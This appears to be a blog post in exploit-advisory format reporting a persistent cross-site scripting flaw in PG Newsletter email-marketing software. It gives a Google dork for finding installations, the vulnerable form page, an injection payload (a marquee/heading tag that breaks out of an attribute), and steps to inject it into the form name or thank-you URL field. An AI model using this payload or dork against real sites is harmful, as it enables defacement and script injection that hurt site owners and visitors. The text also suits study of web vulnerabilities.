PG Newsletter persistent XSS vulnerability

%+         $…….#……..4………|)…….0…………\/\/       %+

                                              %+                                                                                                       %+
%++++++++++++++++++++++++++++++++++++++++# Exploit Title: PG Newsletter persistent XSS vulnerability
# Vendor:  demo.newsletter.pro
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# My Blog: http://www.shadowrootkit.wordpress.com
# Google Dork:  © 2010 PilotGroup.NET Powered by PG Newsletter Software – email marketing software
*************************************************************************************************
Persistent XSS Vulnerability
********************************
{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit
EXPLOIT:  “>><marquee><h1>XSSed_by_r007k17</h1></marquee>

Observe: login to the admin panel(demo).Inject this script in a create form page, i.e, (DEMO) in formname field or thankyoupageURL field
Now observe: demo.newsletter.pro/forms/index.php

**************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14–
***************************************************************************************************

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: